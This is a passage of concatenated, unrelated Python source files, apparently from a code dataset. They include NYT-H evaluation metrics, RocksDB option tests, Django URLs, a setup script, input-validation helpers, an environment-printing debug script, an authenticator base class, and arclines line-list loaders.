        results.update({"magt_p": ma_p, "magt_r": ma_r, "magt_f1": ma_f1})
    logger.info("***** {} Eval results {} *****".format(dataset_name, prefix))
    for key in sorted(results.keys()):
        logger.info("  %s = %s", key, str(results[key]))
    return results, eval_loss, preds, labels, outs
def compute_dsgt(labels, preds, rel2id, verbose=True):
    """Macro precision/recall/F1 over non-NA relations against the DS labels.

    (DSGT presumably stands for distantly-supervised ground truth in the
    NYT-H terminology — confirm against the dataset paper.)

    Args:
        labels: gold relation ids.
        preds: predicted relation ids.
        rel2id: relation name -> id mapping; 'NA' is excluded from averages.
        verbose: print the three scores when True.

    Returns:
        (macro precision, macro recall, macro F1) over non-NA relations.
    """
    id2rel = {idx: rel for rel, idx in rel2id.items()}
    ids = list(range(len(rel2id)))
    target_names = [id2rel[i] for i in ids]
    report = metrics.classification_report(labels, preds,
                                           digits=4, labels=ids,
                                           target_names=target_names, output_dict=True)
    # Keep only the per-relation rows of the report, dropping 'NA' and the
    # aggregate entries (accuracy, macro avg, ...).
    known = set(target_names)
    rows = [val for key, val in report.items() if key in known and key != 'NA']
    macro_p = sum(v['precision'] for v in rows) / len(rows)
    macro_r = sum(v['recall'] for v in rows) / len(rows)
    macro_f1 = sum(v['f1-score'] for v in rows) / len(rows)
    if verbose:
        print("DSGT Macro Precision: {:.3f}".format(macro_p * 100))
        print("DSGT Macro Recall: {:.3f}".format(macro_r * 100))
        print("DSGT Macro F1: {:.3f}".format(macro_f1 * 100))
    return macro_p, macro_r, macro_f1
def compute_magt(labels, preds, track, rel2id, test, id2results, verbose=True):
    """Per-relation macro P/R/F1 against the manual bag annotations.

    For every non-NA relation, each test instance (or each bag, for the
    bag tracks) becomes a binary example: the gold label is 1 when its
    ``bag_label`` is 'yes', and the prediction is whether the system marked
    that relation True in ``id2results[...]['rel2result']``.  The three
    returned scores are unweighted means over relations.

    NOTE(review): the *labels* and *preds* arguments are not used in the
    body — confirm whether they are kept only for signature symmetry with
    :func:`compute_dsgt`.

    Args:
        track: one of sent2sent/sent/bag2sent/bag2bag/bag; selects whether
            instances are keyed by instance_id or bag_id.
        rel2id: relation name -> id mapping.
        test: list of test instances (dicts with relation/bag_label/ids).
        id2results: id -> per-instance prediction record (from eval_mc files).
        verbose: print the three scores when True.

    Returns:
        (macro precision, macro recall, macro F1).
    """
    id_names = {
        "sent2sent": "instance_id",
        "sent": "instance_id",
        "bag2sent": "instance_id",
        "bag2bag": "bag_id",
        "bag": "bag_id",
    }
    id_name = id_names[track]
    # initialization
    id2ins = dict()
    rel2ids = dict()
    rel2yes_ids = dict()
    for rel in rel2id:
        if rel != 'NA':
            rel2ids[rel] = list()
            rel2yes_ids[rel] = list()
    for ins in test:
        # create index
        id2ins[ins[id_name]] = ins
        rel2ids[ins['relation']].append(ins[id_name])
        if ins['bag_label'] == 'yes':
            rel2yes_ids[ins['relation']].append(ins[id_name])
    # without yes instances from other relations
    stat_results = dict()
    for rel in rel2id:
        if rel != 'NA':
            stat_results[rel] = dict(preds=list(), labels=list())
    bag_ids = set()
    for ins in test:
        # On bag tracks, count each bag only once (first occurrence wins).
        if track in {"bag", "bag2bag"}:
            if ins["bag_id"] not in bag_ids:
                bag_ids.add(ins["bag_id"])
            else:
                continue
        if ins['bag_label'] == 'yes':
            stat_results[ins['relation']]['labels'].append(1)
        else:
            stat_results[ins['relation']]['labels'].append(0)
        stat_results[ins['relation']]['preds'].append(int(id2results[ins[id_name]]['rel2result'][ins['relation']]))
    for rel in stat_results:
        assert len(stat_results[rel]['preds']) == len(stat_results[rel]['labels'])
    rel2f1s = dict()
    for rel in stat_results:
        rel2f1s[rel] = dict(precision=0.0, recall=0.0, f1_score=0.0)
    # Binary P/R/F1 per relation against the manual yes/no labels.
    for rel in stat_results:
        rel2f1s[rel]['f1_score'] = metrics.f1_score(stat_results[rel]['labels'], stat_results[rel]['preds'])
        rel2f1s[rel]['precision'] = metrics.precision_score(stat_results[rel]['labels'], stat_results[rel]['preds'])
        rel2f1s[rel]['recall'] = metrics.recall_score(stat_results[rel]['labels'], stat_results[rel]['preds'])
    precisions = [x['precision'] for x in rel2f1s.values()]
    macro_precision = sum(precisions)/len(precisions)
    recalls = [x['recall'] for x in rel2f1s.values()]
    macro_recall = sum(recalls)/len(recalls)
    f1s = [x['f1_score'] for x in rel2f1s.values()]
    macro_f1 = sum(f1s) / len(f1s)
    if verbose:
        print("MAGT Macro Precision: {:.3f}".format(macro_precision*100))
        print("MAGT Macro Recall: {:.3f}".format(macro_recall*100))
        print("MAGT Macro F1: {:.3f}".format(macro_f1*100))
    return macro_precision, macro_recall, macro_f1
if __name__ == "__main__":
    # Standalone entry point: score a prediction file against the NYT-H
    # test set on the chosen track, printing DSGT and MAGT macro scores.
    arg_parser = argparse.ArgumentParser(description="Evaluation on NYT-H")
    arg_parser.add_argument("-k", "--track", type=str, required=True,
                            choices=["sent2sent", "bag2sent", "bag2bag"],
                            help="Evaluation Track")
    arg_parser.add_argument("-r", "--rel2id", type=str, required=True,
                            help="filepath to rel2id.json file")
    arg_parser.add_argument("-t", "--test", type=str, required=True,
                            help="filepath to test.json file")
    arg_parser.add_argument("-p", "--pred", type=str, required=True,
                            help="filepath to prediction results")
    args = arg_parser.parse_args()
    with open(args.rel2id, 'r', encoding='utf-8') as fin:
        rel2id = json.load(fin)
    test = load_line_json(args.test)
    pred_results = load_line_json(args.pred)
    track = args.track
    # Bag-level track keys instances by bag id; sentence-level by instance id.
    track_id_name = {
        "bag2bag": "bag_id",
        "bag2sent": "instance_id",
        "sent2sent": "instance_id"
    }[track]
    id2test = {}
    for ins in test:
        id2test[ins[track_id_name]] = ins
    id2results = dict()
    labels = list()
    preds = list()
    for ins in pred_results:
        # One-hot style record: only the predicted relation is marked True.
        rel2result = {}
        for rel in rel2id:
            rel2result[rel] = False
        rel2result[ins['pred']] = True
        id2results[ins[track_id_name]] = {track_id_name: ins[track_id_name], "rel2result": rel2result}
        labels.append(rel2id[id2test[ins[track_id_name]]["relation"]])
        preds.append(rel2id[ins['pred']])
    print(f"----------- {track} Track Evaluation -----------")
    ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, rel2id, verbose=True)
    ma_p, ma_r, ma_f1 = compute_magt(labels, preds, track, rel2id, test, id2results, verbose=True)
| StarcoderdataPython |
6564242 | import warnings
class IncorrectGeometryTypeException(Exception):
    """
    Raised when the input json file is not of the required multipoint
    geometry type.

    The explicit ``__init__(self, message)`` was removed: ``Exception``
    already accepts and stores the message, so forwarding it was redundant.
    """
class NotURLDefinedException(Exception):
    """
    Raised when the arguments do not include a URL.
    """
    pass
class WFSNotDefinedException(Exception):
    """
    Raised when no WFS service is defined from which to retrieve the features.
    """
    pass
class TransportModeNotDefinedException(Exception):
    """
    Raised when no transport mode is defined/selected for retrieving the features.
    """
    pass
class ImpedanceAttributeNotDefinedException(Exception):
    """
    Raised when the impedance argument does not match any of the available
    impedance values.

    The explicit ``__init__(self, message)`` was removed: ``Exception``
    already accepts and stores the message, so forwarding it was redundant.
    """
class NotParameterGivenException(Exception):
    """
    Raised when some required parameters have not been given.

    The explicit ``__init__(self, message)`` was removed: ``Exception``
    already accepts and stores the message, so forwarding it was redundant.
    """
def deprecated(func):
    """This is a decorator which can be used to mark functions
    as deprecated. It will result in a warning being emitted
    when the function is used.
    Taken from http://code.activestate.com/recipes/391367-deprecated/

    Uses ``functools.wraps`` instead of manually copying ``__name__``,
    ``__doc__`` and ``__dict__``: wraps also preserves ``__module__``,
    ``__qualname__`` and sets ``__wrapped__``, so introspection and
    pickling-by-name keep working.
    """
    from functools import wraps

    @wraps(func)
    def newFunc(*args, **kwargs):
        # stacklevel=2 points the warning at the caller, not this wrapper.
        warnings.warn("Call to deprecated function %s." % func.__name__,
                      category=DeprecationWarning,
                      stacklevel=2)
        return func(*args, **kwargs)
    return newFunc
| StarcoderdataPython |
6442562 | import unittest
import rocksdb
class TestFilterPolicy(rocksdb.interfaces.FilterPolicy):
    """Minimal FilterPolicy stub: a constant filter that matches every key."""
    def create_filter(self, keys):
        # Constant placeholder filter body; its contents are never inspected.
        return b'nix'
    def key_may_match(self, key, fil):
        # Always report a possible match (no false negatives by construction).
        return True
    def name(self):
        # Identifier recorded for this policy.
        return b'testfilter'
class TestMergeOperator(rocksdb.interfaces.MergeOperator):
    """Minimal MergeOperator stub whose merges always report failure."""
    def full_merge(self, *args, **kwargs):
        # Returns (success, new_value); always signals an unsuccessful merge.
        return (False, None)
    def partial_merge(self, *args, **kwargs):
        return (False, None)
    def name(self):
        # Identifier recorded for this operator.
        return b'testmergeop'
class TestOptions(unittest.TestCase):
    """Unit tests for ``rocksdb.Options`` getters/setters and table factories."""

    # def test_default_merge_operator(self):
    #     opts = rocksdb.Options()
    #     self.assertEqual(True, opts.paranoid_checks)
    #     opts.paranoid_checks = False
    #     self.assertEqual(False, opts.paranoid_checks)
    #     self.assertIsNone(opts.merge_operator)
    #     opts.merge_operator = "uint64add"
    #     self.assertIsNotNone(opts.merge_operator)
    #     self.assertEqual(opts.merge_operator, "uint64add")
    #     with self.assertRaises(TypeError):
    #         opts.merge_operator = "not an operator"
    def test_compaction_pri(self):
        opts = rocksdb.Options()
        # default compaction_pri
        self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.by_compensated_size)
        opts.compaction_pri = rocksdb.CompactionPri.by_compensated_size
        self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.by_compensated_size)
        opts.compaction_pri = rocksdb.CompactionPri.oldest_largest_seq_first
        self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.oldest_largest_seq_first)
        opts.compaction_pri = rocksdb.CompactionPri.min_overlapping_ratio
        self.assertEqual(opts.compaction_pri, rocksdb.CompactionPri.min_overlapping_ratio)
    def test_enable_write_thread_adaptive_yield(self):
        opts = rocksdb.Options()
        self.assertEqual(opts.enable_write_thread_adaptive_yield, True)
        opts.enable_write_thread_adaptive_yield = False
        self.assertEqual(opts.enable_write_thread_adaptive_yield, False)
    def test_allow_concurrent_memtable_write(self):
        opts = rocksdb.Options()
        self.assertEqual(opts.allow_concurrent_memtable_write, True)
        opts.allow_concurrent_memtable_write = False
        self.assertEqual(opts.allow_concurrent_memtable_write, False)
    def test_compression_opts(self):
        opts = rocksdb.Options()
        compression_opts = opts.compression_opts
        # default value
        self.assertEqual(isinstance(compression_opts, dict), True)
        self.assertEqual(compression_opts['window_bits'], -14)
        self.assertEqual(compression_opts['level'], -1)
        self.assertEqual(compression_opts['strategy'], 0)
        self.assertEqual(compression_opts['max_dict_bytes'], 0)
        with self.assertRaises(TypeError):
            # NOTE(review): list(1,2) itself raises TypeError before the
            # assignment runs, so the setter's type check is never exercised.
            # Probably meant to assign a non-dict such as [1, 2] — confirm.
            opts.compression_opts = list(1,2)
        opts.compression_opts = {'window_bits': 1, 'level': 2, 'strategy': 3, 'max_dict_bytes': 4}
        compression_opts = opts.compression_opts
        self.assertEqual(compression_opts['window_bits'], 1)
        self.assertEqual(compression_opts['level'], 2)
        self.assertEqual(compression_opts['strategy'], 3)
        self.assertEqual(compression_opts['max_dict_bytes'], 4)
    def test_simple(self):
        opts = rocksdb.Options()
        self.assertEqual(True, opts.paranoid_checks)
        opts.paranoid_checks = False
        self.assertEqual(False, opts.paranoid_checks)
        self.assertIsNone(opts.merge_operator)
        ob = TestMergeOperator()
        opts.merge_operator = ob
        self.assertEqual(opts.merge_operator, ob)
        self.assertIsInstance(
            opts.comparator,
            rocksdb.BytewiseComparator)
        self.assertIn(opts.compression,
                      (rocksdb.CompressionType.no_compression,
                       rocksdb.CompressionType.snappy_compression))
        opts.compression = rocksdb.CompressionType.zstd_compression
        self.assertEqual(rocksdb.CompressionType.zstd_compression, opts.compression)
    def test_block_options(self):
        rocksdb.BlockBasedTableFactory(
            block_size=4096,
            filter_policy=TestFilterPolicy(),
            cache_index_and_filter_blocks=True,
            block_cache=rocksdb.LRUCache(100))
    def test_unicode_path(self):
        name = b'/tmp/M\xc3\xbcnchen'.decode('utf8')
        opts = rocksdb.Options()
        opts.db_log_dir = name
        opts.wal_dir = name
        self.assertEqual(name, opts.db_log_dir)
        self.assertEqual(name, opts.wal_dir)
    def test_table_factory(self):
        opts = rocksdb.Options()
        self.assertIsNone(opts.table_factory)
        opts.table_factory = rocksdb.BlockBasedTableFactory()
        opts.table_factory = rocksdb.PlainTableFactory()
    def test_compaction_style(self):
        opts = rocksdb.Options()
        self.assertEqual('level', opts.compaction_style)
        opts.compaction_style = 'universal'
        self.assertEqual('universal', opts.compaction_style)
        opts.compaction_style = 'level'
        self.assertEqual('level', opts.compaction_style)
        # assertRaisesRegexp was deprecated in Python 3.2 and removed in
        # 3.12; assertRaisesRegex is the supported name.
        with self.assertRaisesRegex(Exception, 'Unknown compaction style'):
            opts.compaction_style = 'foo'
    def test_compaction_opts_universal(self):
        opts = rocksdb.Options()
        uopts = opts.compaction_options_universal
        self.assertEqual(-1, uopts['compression_size_percent'])
        self.assertEqual(200, uopts['max_size_amplification_percent'])
        self.assertEqual('total_size', uopts['stop_style'])
        self.assertEqual(1, uopts['size_ratio'])
        self.assertEqual(2, uopts['min_merge_width'])
        self.assertGreaterEqual(4294967295, uopts['max_merge_width'])
        new_opts = {'stop_style': 'similar_size', 'max_merge_width': 30}
        opts.compaction_options_universal = new_opts
        uopts = opts.compaction_options_universal
        self.assertEqual(-1, uopts['compression_size_percent'])
        self.assertEqual(200, uopts['max_size_amplification_percent'])
        self.assertEqual('similar_size', uopts['stop_style'])
        self.assertEqual(1, uopts['size_ratio'])
        self.assertEqual(2, uopts['min_merge_width'])
        self.assertEqual(30, uopts['max_merge_width'])
    def test_row_cache(self):
        opts = rocksdb.Options()
        self.assertIsNone(opts.row_cache)
        opts.row_cache = cache = rocksdb.LRUCache(2*1024*1024)
        self.assertEqual(cache, opts.row_cache)
| StarcoderdataPython |
3539161 | """memcached client, based on mixpanel's memcache_client library
Usage example::
import aiomcache
mc = aiomcache.Client("127.0.0.1", 11211, timeout=1, connect_timeout=5)
yield from mc.set("some_key", "Some value")
value = yield from mc.get("some_key")
yield from mc.delete("another_key")
"""
from .client import Client
from .exceptions import ClientException, ValidationException
__all__ = ('Client', 'ClientException', 'ValidationException')
__version__ = '0.6.0'
| StarcoderdataPython |
3328029 | from django.urls import path
from . import views
# Route table: each parameterless URL maps onto the identically-named view
# in ``views.py``.
urlpatterns = [
    path('inject-works', views.inject_works),
    path('request-scope-works', views.request_scope_works),
    path('request-is-injectable', views.request_is_injectable),
]
| StarcoderdataPython |
6531439 | # StreetSpace
# See full license in LICENSE.txt
from setuptools import setup
# provide a long description using reStructuredText
long_description = """
**StreetSpace** is a package under development for measuring and analysing
streetscapes and street networks.
"""
# list of classifiers from the PyPI classifiers trove
classifiers = ['Development Status :: 2 - Pre-Alpha',
               'License :: OSI Approved :: MIT License',
               'Operating System :: OS Independent',
               'Intended Audience :: Science/Research',
               'Topic :: Scientific/Engineering :: GIS',
               'Topic :: Scientific/Engineering :: Information Analysis',
               'Natural Language :: English',
               'Programming Language :: Python',
               'Programming Language :: Python :: 3.6']
# Read the pinned runtime dependencies; an explicit encoding avoids
# depending on the platform's locale default.
with open('requirements.txt', encoding='utf-8') as f:
    requirements_lines = f.readlines()
install_requires = [r.strip() for r in requirements_lines]
# now call setup
setup(name='streetspace',
      version='0.1.0',
      description='Measure and analyse streetscapes and street networks',
      long_description=long_description,
      classifiers=classifiers,
      url='https://github.com/chesterharvey/StreetSpace',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      platforms='any',
      packages=['streetspace'],
      install_requires=install_requires)
def leiaInt(msg):
    """Prompt with *msg* until the user types a valid integer.

    Invalid text re-prompts with an error message; Ctrl+C aborts the
    prompt and returns 0 after informing the user.
    """
    while True:
        try:
            return int(input(msg))
        except (ValueError, TypeError):
            print('\033[1;3;31mERRO: Por favor, digite um número inteiro válido.\033[0;0;0m')
        except KeyboardInterrupt:
            print('\n\033[1;3;33mUsuário preferiu não digitar esse número.\033[0;0;0m\n')
            return 0
def leiaFloat(msg):
    """Prompt with *msg* until the user types a valid real number.

    Invalid text re-prompts with an error message; Ctrl+C aborts the
    prompt and returns 0 after informing the user.
    """
    while True:
        try:
            return float(input(msg))
        except (TypeError, ValueError):
            print('\033[1;3;31mERRO: Por favor, digite um número real válido.\033[0;0;0m')
        except KeyboardInterrupt:
            print('\n\033[1;3;33mUsuário preferiu não digitar esse número.\033[0;0;0m\n')
            return 0
# Demo: read one validated integer and one validated real number, then
# report both back to the user.
li = leiaInt('Digite um número inteiro: ')
lr = leiaFloat('Digite um número real: ')
print(f'\033[1;3;34mO valor inteiro foi {li} e o real foi {lr}.\033[0;0;0m')
1887563 | <filename>hello.py<gh_stars>0
#!/usr/bin/env python3
"""CGI-style debug script: dump the process environment (raw and as JSON)
and echo the client's User-Agent header when one is present."""
import os, json
# Print the raw environment mapping (os.environ repr).
print(os.environ)
# Print the same environment pretty-printed as JSON.
json_object = json.dumps(dict(os.environ), indent = 1)
print(json_object)
# print(os.environ["QUERY_STRING"])
# Print query strings if any
# print(os.environ["BROWSER"])
# Print out browser info
# HTTP_USER_AGENT is set by the web server when this runs as a CGI script.
if "HTTP_USER_AGENT" in os.environ.keys():
    print('-----------------')
    print(os.environ["HTTP_USER_AGENT"])
| StarcoderdataPython |
from abc import ABC, abstractclassmethod, abstractmethod

from ghubunix.models.config import Config
class Authenticator(ABC):
    """Abstract base class for authenticators.

    A concrete authenticator implements one authentication flow plus the
    persistence of the credentials it obtains.

    Fix: the methods were decorated with ``abstractclassmethod`` (deprecated
    since Python 3.3) even though they take ``self`` — they are instance
    methods, so plain ``abstractmethod`` is correct; ``from_config`` keeps
    its static nature via ``staticmethod`` stacked over ``abstractmethod``.
    """

    @abstractmethod
    def authenticate(self):
        """Perform authentication against the remote service."""

    @abstractmethod
    def store_token(self):
        """Persist the authentication token(s) obtained by authenticate()."""

    @abstractmethod
    def retrieve_token(self):
        """Load previously stored authentication token(s)."""

    @staticmethod
    @abstractmethod
    def from_config(config: Config):
        """Build an authenticator instance from *config*."""

    @abstractmethod
    def to_config(self, config: Config):
        """Write this authenticator's settings into *config*."""

    @abstractmethod
    def verify(self):
        """Check that the current credentials are still valid."""
| StarcoderdataPython |
1914981 | """ Module for I/O in arclines
"""
from __future__ import (print_function, absolute_import, division, unicode_literals)
import numpy as np
import os
import datetime
import pdb
from astropy.table import Table, Column, vstack
from astropy.io import fits
from linetools import utils as ltu
import arclines # For path
from arclines import defs
line_path = arclines.__path__[0]+'/data/lists/'
nist_path = arclines.__path__[0]+'/data/NIST/'
def load_by_hand():
    """ Load the by-hand arc line list shipped with arclines.

    Reads data/sources/by_hand_list.ascii, marks every line as NIST
    verified, and maps the short sInstr/sSource columns onto the standard
    Instr/Source ones.

    Returns
    -------
    byhand : Table
        Columns: ion, wave, NIST, Instr, amplitude, Source
    """
    str_len_dict = defs.str_len()
    src_file = arclines.__path__[0]+'/data/sources/by_hand_list.ascii'
    # Read
    line_list = Table.read(src_file, format='ascii.fixed_width', comment='#')
    # Every by-hand line is treated as NIST-verified.
    line_list['NIST'] = 1
    # Deal with Instr and Source
    ilist, slist = [], []
    for row in line_list:
        ilist.append(defs.instruments()[row['sInstr']]) # May need to split
        slist.append(row['sSource'])
    line_list['Instr'] = ilist
    # Fixed-width bytes column sized from the project-wide string lengths.
    line_list['Source'] = np.array(slist, dtype='S{:d}'.format(str_len_dict['Source']))
    # Trim
    return line_list[['ion', 'wave', 'NIST', 'Instr', 'amplitude', 'Source']]
def load_line_list(line_file, add_path=False, use_ion=False, NIST=False):
    """ Load a single arc line list from disk.
    Parameters
    ----------
    line_file : str
        Full path to line_list, or name of the ion when use_ion=True
    add_path : bool, optional
        Not yet implemented
    use_ion : bool, optional
        Interpret line_file as an ion name and build the standard path
    NIST : bool, optional
        NIST formatted table?  Triggers column clean-up below.
    Returns
    -------
    line_list : Table
    """
    if use_ion:
        line_file = line_path+'{:s}_lines.dat'.format(line_file)
    line_list = Table.read(line_file, format='ascii.fixed_width', comment='#')
    # NIST tables need their raw columns normalized to arclines' schema.
    if NIST:
        # Remove unwanted columns
        tkeys = line_list.keys()
        for badkey in ['Ritz','Acc.','Type','Ei','Lower','Upper','TP','Line']:
            for tkey in tkeys:
                if badkey in tkey:
                    line_list.remove_column(tkey)
        # Relative intensity -- Strip junk off the end
        # Values can be masked, plain numbers, or numbers with a trailing
        # qualifier character (e.g. '500*'); anything unparsable becomes 0.
        reli = []
        for imsk, idat in zip(line_list['Rel.'].mask, line_list['Rel.'].data):
            if imsk:
                reli.append(0.)
            else:
                try:
                    reli.append(float(idat))
                except ValueError:
                    try:
                        reli.append(float(idat[:-1]))
                    except ValueError:
                        reli.append(0.)
        line_list.remove_column('Rel.')
        line_list['RelInt'] = reli
        #
        gdrows = line_list['Observed'] > 0.  # Eliminate dummy lines
        line_list = line_list[gdrows]
        line_list.rename_column('Observed','wave')
        # Grab ion name from the '<ion>_...' file name.
        # NOTE(review): assumes '/' separators and that pattern -- breaks on
        # Windows paths or differently named files.
        i0 = line_file.rfind('/')
        i1 = line_file.rfind('_')
        ion = line_file[i0+1:i1]
        line_list.add_column(Column([ion]*len(line_list), name='Ion', dtype='U5'))
        line_list.add_column(Column([1]*len(line_list), name='NIST'))
    # Return
    return line_list
def load_line_lists(lines, unknown=False, skip=False, all=False, NIST=False):
    """ Loads a series of line list files
    Parameters
    ----------
    lines : list
        Names of the ions/lamps to load
    unknown : bool, optional
        Append the UNKNWN line list
    skip : bool, optional
        Skip missing line lists (mainly for building)
    all : bool, optional
        Ignore `lines` and load every list found on disk
    NIST : bool, optional
        Load the full NIST linelists
    Returns
    -------
    line_lists : Table or None
        None when nothing could be loaded
    """
    import glob
    # All?  Derive the ion names from the files present on disk.
    if all:
        line_files = glob.glob(line_path+'*_lines.dat')
        lines = []
        for line_file in line_files:
            i0 = line_file.rfind('/')
            i1 = line_file.rfind('_')
            lines.append(line_file[i0+1:i1])
    # Read standard files
    lists = []
    for line in lines:
        if NIST:
            line_file = nist_path+'{:s}_vacuum.ascii'.format(line)
        else:
            line_file = line_path+'{:s}_lines.dat'.format(line)
        if not os.path.isfile(line_file):
            # Fix: removed a leftover `import pdb; pdb.set_trace()` debugger
            # breakpoint that hung any non-interactive run before the raise.
            if not skip:
                raise IOError("Input line {:s} is not included in arclines".format(line))
        else:
            lists.append(load_line_list(line_file, NIST=NIST))
    # Stack
    if len(lists) == 0:
        return None
    line_lists = vstack(lists, join_type='exact')
    # Unknown
    if unknown:
        unkn_lines = load_unknown_list(lines)
        unkn_lines.remove_column('line_flag')  # may wish to have this info
        # Stack
        line_lists = vstack([line_lists, unkn_lines])
    # Return
    return line_lists
def load_source_table():
    """ Load the table of arcline sources shipped with the package.
    Returns
    -------
    sources : Table
    """
    source_file = arclines.__path__[0] + '/data/sources/arcline_sources.ascii'
    return Table.read(source_file, format='ascii.fixed_width', comment='#')
def load_nist(ion):
    """Parse a NIST ASCII table.  Note that the long ---- should have
    been commented out and also the few lines at the start.

    Fix: the two bare ``except:`` clauses are narrowed to ``except
    Exception`` so Ctrl+C / SystemExit are no longer swallowed while
    parsing the 'Rel.' column.

    Parameters
    ----------
    ion : str
        Name of ion
    Returns
    -------
    tbl : Table
        Table of lines
    """
    import glob
    # Root (for development only)
    root = arclines.__path__[0]
    # Find file
    srch_file = root + '/data/NIST/'+ion+'_vacuum.ascii'
    nist_file = glob.glob(srch_file)
    if len(nist_file) == 0:
        raise IOError("Cannot find NIST file {:s}".format(srch_file))
    # Read
    nist_tbl = Table.read(nist_file[0], format='ascii.fixed_width')
    gdrow = nist_tbl['Observed'] > 0.  # Eliminate dummy lines
    nist_tbl = nist_tbl[gdrow]
    # Now unique values only (no duplicates)
    uniq, indices = np.unique(nist_tbl['Observed'],return_index=True)
    nist_tbl = nist_tbl[indices]
    # Deal with Rel: plain ints, ints with a trailing qualifier (e.g. '500*'),
    # or masked/unparsable values (which become 0).
    agdrel = []
    for row in nist_tbl:
        try:
            gdrel = int(row['Rel.'])
        except Exception:
            try:
                gdrel = int(row['Rel.'][:-1])
            except Exception:
                gdrel = 0
        agdrel.append(gdrel)
    agdrel = np.array(agdrel)
    # Remove and add
    nist_tbl.remove_column('Rel.')
    nist_tbl.remove_column('Ritz')
    nist_tbl['RelInt'] = agdrel
    #nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='S5'))
    nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='U5'))
    nist_tbl.rename_column('Observed','wave')
    # Return
    return nist_tbl
def load_unknown_list(lines, unknwn_file=None, all=False):
    """ Load the list of unidentified (UNKNWN) lines, optionally restricted
    to those seen with the given lamps.
    Parameters
    ----------
    lines : list
        Restricted lines; use all=True for all
    unknwn_file : str, optional
        Alternate path to the UNKNWNs file (defaults to the packaged one)
    all : bool, optional
        Return every unknown line without filtering
    Returns
    -------
    unknwn_lines : Table
    """
    line_dict = defs.lines()
    # Load
    line_path = arclines.__path__[0]+'/data/lists/'
    if unknwn_file is None:
        unknwn_file = line_path+'UNKNWNs.dat'
    line_list = load_line_list(unknwn_file)
    # Cut on input lamps?
    if all:
        return line_list
    else:
        msk = np.array([False]*len(line_list))
        for line in lines:
            line_flag = line_dict[line]
            # line_flag is a power-of-two bit; this modulo test checks whether
            # that bit is set in the row's combined line_flag bitmask.
            match = line_list['line_flag'] % (2*line_flag) >= line_flag
            msk[match] = True
        # Finish
        return line_list[msk]
def load_spectrum(spec_file, index=0):
    """ Load a simple 1D spectrum from an input file, dispatching on the
    file extension.
    Parameters
    ----------
    spec_file : str
        .fits -- Assumes simple ndarray in 0 extension
        .ascii -- Assumes Table.read(format='ascii') works with single column
        .hdf5 -- Expects an 'arcs/<index>/spec' dataset
        .json -- Expects a top-level 'spec' key
    index : int, optional
        Which arc to take from an hdf5 file
    Returns
    -------
    spec : ndarray
    """
    import h5py
    iext = spec_file.rfind('.')
    if 'ascii' in spec_file[iext:]:
        tbl = Table.read(spec_file, format='ascii')
        key = tbl.keys()[0]
        spec = tbl[key].data
    elif 'fits' in spec_file[iext:]:
        spec = fits.open(spec_file)[0].data
    elif 'hdf5' in spec_file[iext:]:
        hdf = h5py.File(spec_file, 'r')
        if 'arcs' in hdf.keys():
            print("Taking arc={:d} in this file".format(index))
            # NOTE(review): Dataset.value was removed in h5py 3.x; newer h5py
            # needs [...] / [()] indexing instead.
            spec = hdf['arcs/'+str(index)+'/spec'].value
        else:
            raise IOError("Not ready for this hdf5 file")
    elif 'json' in spec_file[iext:]:
        jdict = ltu.loadjson(spec_file)
        try:
            spec = np.array(jdict['spec'])
        except KeyError:
            raise IOError("spec not in your JSON dict")
    # NOTE(review): an unrecognized extension falls through with `spec`
    # unbound and raises UnboundLocalError here.
    # Return
    return spec
def write_line_list(tbl, outfile):
    """ Write an arc-line Table to disk with a creation-date header.
    Parameters
    ----------
    tbl : Table
        Line list; its 'wave' column display format is set in place.
    outfile : str
        Destination path.
    """
    # Show wavelengths with 4 decimal places in the output file.
    tbl['wave'].format = '10.4f'
    stamp = str(datetime.date.today().strftime('%Y-%b-%d'))
    with open(outfile,'w') as f:
        f.write('# Creation Date: {:s}\n'.format(stamp))
        tbl.write(f, format='ascii.fixed_width')
| StarcoderdataPython |
97696 | #!/usr/bin/env python
import sys, json
from functools import reduce
inputFile = sys.argv[1]   # path to the raw build-matrix JSON
outputFile = sys.argv[2]  # path for the normalized JSON output
with open(inputFile, 'r') as f:
    data = f.read()
# Top-level configuration dict; expected keys include 'buildMatrix' and
# optional 'buildFlags' / 'buildEnv' defaults.
config = json.loads(data)
def copy_without(xs, key):
    """Return a shallow copy of dict *xs* with *key* removed.

    Raises KeyError when *key* is absent, just like dict.pop without a
    default; *xs* itself is never modified.
    """
    trimmed = dict(xs)
    del trimmed[key]
    return trimmed
def merge_filtered(result, xs, pred):
    """Copy into *result* every item of *xs* whose key satisfies *pred*.

    Mutates *result* in place and returns it for chaining.
    """
    result.update({k: v for k, v in xs.items() if pred(k)})
    return result
def make_pipeline(*functions):
    """Compose *functions* left to right: make_pipeline(f, g)(x) == g(f(x))."""
    def compose(inner, outer):
        return lambda value: outer(inner(value))
    return reduce(compose, functions)
def filter_step(f):
    """Wrap predicate *f* as a pipeline stage that lazily filters its input."""
    def stage(items):
        return filter(f, items)
    return stage
def map_step(f):
    """Wrap *f* as a pipeline stage that lazily maps it over its input."""
    def stage(items):
        return map(f, items)
    return stage
def reduce_step(f):
    """Wrap binary *f* as a pipeline stage that folds its input to one value."""
    def stage(items):
        return reduce(f, items)
    return stage
def lift_builds(os, settings):
    """Expand an (os, settings) pair into one [os, build, rest] triple per
    entry of settings['builds'], where rest is the settings dict without
    'builds' (each triple gets its own copy, as before)."""
    return [[os, build, copy_without(settings, 'builds')]
            for build in settings['builds']]
def normalize(what, settings, buildType, defaults):
    """Build the final '<what>' list (e.g. flags/env) for one build entry:
    defaults + generic extras + build-type-specific extras, stored under key
    *what*; all other settings keys are copied through except the consumed
    '...<What>'-suffixed ones."""
    # Generic extras, e.g. 'extraBuildFlags'.
    key1 = 'extraBuild{}'.format(what.capitalize())
    # Build-type-specific extras, e.g. 'extraDebugBuildFlags'.
    key2 = 'extra{}Build{}'.format(buildType.capitalize(), what.capitalize())
    res1 = settings[key1] if key1 in settings else []
    res2 = settings[key2] if key2 in settings else []
    return merge_filtered({ what: defaults + res1 + res2 },
                          settings,
                          lambda key: not key.endswith(what.capitalize()))
def normalize_entry(os, build_type, settings, what):
    """Normalize one [os, build_type, settings] entry for aspect *what*,
    folding in the file-level defaults from the global `config`
    (e.g. config['buildFlags'] when what == 'flags')."""
    key = 'build{}'.format(what.capitalize())
